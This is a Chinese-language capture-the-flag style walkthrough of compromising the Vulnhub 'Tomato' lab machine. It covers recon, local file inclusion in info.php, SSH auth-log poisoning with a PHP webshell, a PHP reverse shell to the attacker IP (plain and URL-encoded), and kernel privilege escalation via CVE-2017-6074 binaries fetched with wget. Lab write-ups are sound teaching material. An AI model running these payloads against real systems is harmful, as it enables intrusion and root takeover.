Vulnhub Tomato靶机渗透记录

    科技2025-05-22  38

    Vulnhub Tomato靶机渗透记录

    环境配置

    靶机镜像下载地址:

    http://www.vulnhub.com/entry/tomato-1,557/

    Kali Linux IP:192.168.1.128Tomato IP: 192.168.1.140

    信息收集

    使用arp-scan -l 扫描本地局域网存活主机: arp-scan -l

    nmap扫描开放端口以及相关信息: nmap -A -p- 192.168.1.140

    访问http服务端口查看页面信息:没有相关可利用信息,继续访问8888端口http服务: 利用dirb对站点目录进行爆破: dirb http://192.168.1.140

    发现其他站点目录,尝试访问:

    http://192.168.1.140/antibot_image/antibots/

    根据修改时间发现info.php文件最新更新,访问并查看源码: 发现文件包含,尝试包含文件…/…/…/…/…/…/etc/passwd:

    http://192.168.1.140/antibot_image/antibots/info.php?image=../../../../../../etc/passwd

    漏洞利用

    已知info.php文件存在文件包含漏洞,以及开放ssh端口,尝试包含ssh认证日志文件/var/log/auth.log,并利用ssh认证用户名实现命令注入:

    尝试用tomato作为用户名进行失败登录,观察相关日志记录: 利用<?php system($_GET['cmd']);?>作为用户名进行php代码注入: <?php system($_GET['cmd']);?>

    验证PHP代码是否注入成功: 访问http://192.168.1.140/antibot_image/antibots/info.php?image=../../../../../../var/log/auth.log&cmd=ls并查看网页源代码: 尝试getshell,利用php反弹shell,Kali攻击机利用nc监听4444端口: nc -lvp 4444

    PHP反弹shell代码如下:

    php -r '$sock=fsockopen("192.168.1.128",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

    进行url编码后得到:

    php+-r+%27%24sock%3dfsockopen(%22192.168.1.128%22%2c4444)%3bexec(%22%2fbin%2fsh+-i+%3c%263+%3e%263+2%3e%263%22)%3b%27

    访问http://192.168.1.140/antibot_image/antibots/info.php?image=../../../../../../var/log/auth.log&cmd=php+-r+%27%24sock%3dfsockopen(%22192.168.1.128%22%2c4444)%3bexec(%22%2fbin%2fsh+-i+%3c%263+%3e%263+2%3e%263%22)%3b%27 成功getshell:

    权限提升

    利用python打开一个终端: python3 -c "import pty;pty.spawn('/bin/bash')"

    2.查看内核版本:

    uname -a

    利用searchsploit搜索相应内核模块:

    searchsploit 4.4.0-21

    利用44300.c,netfilter模块的提权POC,使用命令:

    searchsploit -m 44300

    查看poc信息,将44300.c分成decr.c与pwn.c两个c文件分别编译:

    gedit 44300.c

    编译出错: 完整安装gcc:

    sudo apt-get install gcc-multilib

    分别编译,编译完成(警告先不管):

    gcc decr.c -m64 -O2 -o decr gcc pwn.c -m64 -O2 -o pwn

    Kali攻击机后台启动Http服务器,上传文件:

    python -m SimpleHTTPServer 8080 &

    目标主机跳转到/tmp目录下,利用wget获取提权exp:

    wget http://192.168.1.128:8080/decr wget http://192.168.1.128:8080/pwn

    赋予exp执行权限运行提权:

    chmod +x decr && chmod +x pwn

    ./decr ./pwn

    提权失败。。。。 网上搜索发现github上面有一个提权相关,Kali主机git项目:

    https://github.com/kkamagui/linux-kernel-exploits git clone https://github.com/kkamagui/linux-kernel-exploits.git

    运行compile.sh 编译c文件,并上传到目标主机,赋予执行权限,运行结果如下:

    wget http://192.168.1.128:8080//linux-kernel-exploits/kernel-4.4.0-21-generic/CVE-2017-6074/CVE-2017-6074 chmod +x CVE-2017-6074

    ./CVE-2017-6074

    提权成功 但是可能是因为物理机电脑CPU不兼容,虚拟机报错: 不过也算渗透成功了。。。

    Processed: 0.009, SQL: 8